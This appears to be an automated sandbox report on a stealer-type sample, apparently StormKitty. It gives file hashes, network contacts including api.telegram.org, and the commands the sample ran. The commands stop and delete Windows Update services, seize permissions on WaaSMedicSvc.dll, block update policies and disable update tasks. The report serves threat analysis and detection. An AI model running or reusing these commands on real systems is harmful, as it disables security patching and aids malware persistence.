"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
Files
\Users\Admin\AppData\Local\Temp\testy.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
| MD5 | 7b8fcb29905e045b7f8c1dc9bc305698 |
| SHA1 | 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8 |
| SHA256 | 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173 |
| SHA512 | d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2 |
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
| MD5 | 6d1c62ec1c2ef722f49b2d8dd4a4df16 |
| SHA1 | 1bb08a979b7987bc7736a8cfa4779383cb0ecfa6 |
| SHA256 | 00da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c |
| SHA512 | c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2 |
C:\Users\Admin\AppData\Local\Temp\AnonFileApi.dll
| MD5 | 7a2d5deab61f043394a510f4e2c0866f |
| SHA1 | ca16110c9cf6522cd7bea32895fd0f697442849b |
| SHA256 | 75db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69 |
| SHA512 | b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0 |
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
C:\Users\Admin\AppData\Local\Temp\tmpCE85.tmp.bat
| MD5 | e87b986da2d91d9cc2203e6f12bdb13d |
| SHA1 | 729e54e08a5cc0784f4d90220a8a1298a6410145 |
| SHA256 | 44eeec4e1ef502fe97433d8588b09fc2e05d65079a3d1f3e071cbd1ae645cf56 |
| SHA512 | 6c5bf1a7c2290a0890534697ad41de4b5ee2821047c328fe279ef580a986ad67821493a15c0f18b6c012e852f34f4f42717c9181bffa12d8328100c90ccfac79 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d0bf3f094fc677a52e2f7f063edf2c85 |
| SHA1 | df3b4123b6e90b681c3cf0f30ef496ce86787aac |
| SHA256 | 47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4 |
| SHA512 | a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\07CGK9RARWSQRHXDB2S5.temp
| MD5 | d0bf3f094fc677a52e2f7f063edf2c85 |
| SHA1 | df3b4123b6e90b681c3cf0f30ef496ce86787aac |
| SHA256 | 47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4 |
| SHA512 | a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 34dc4454196f0ad68db18c132e5e281c |
| SHA1 | b0ce0637ccbe63c97177fa298098deb9a1207d91 |
| SHA256 | 8ef8c0b7fcfe8ec307019ea0de462a7004de826415a941f9124fabed3a1a8995 |
| SHA512 | 65cc1698795f46c1bdf3d70110932159e37ed363514b82b137b4ef0022f84fb7566f1c88014d61982f2b4a7cae4ae35fa8a8ac12fb4dcd3b28ef8f60709a27a8 |
C:\Users\Admin\AppData\Roaming\Google\Libs\WR64.sys
| MD5 | 0c0195c48b6b8582fa6f6373032118da |
| SHA1 | d25340ae8e92a6d29f599fef426a2bc1b5217299 |
| SHA256 | 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 |
| SHA512 | ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d |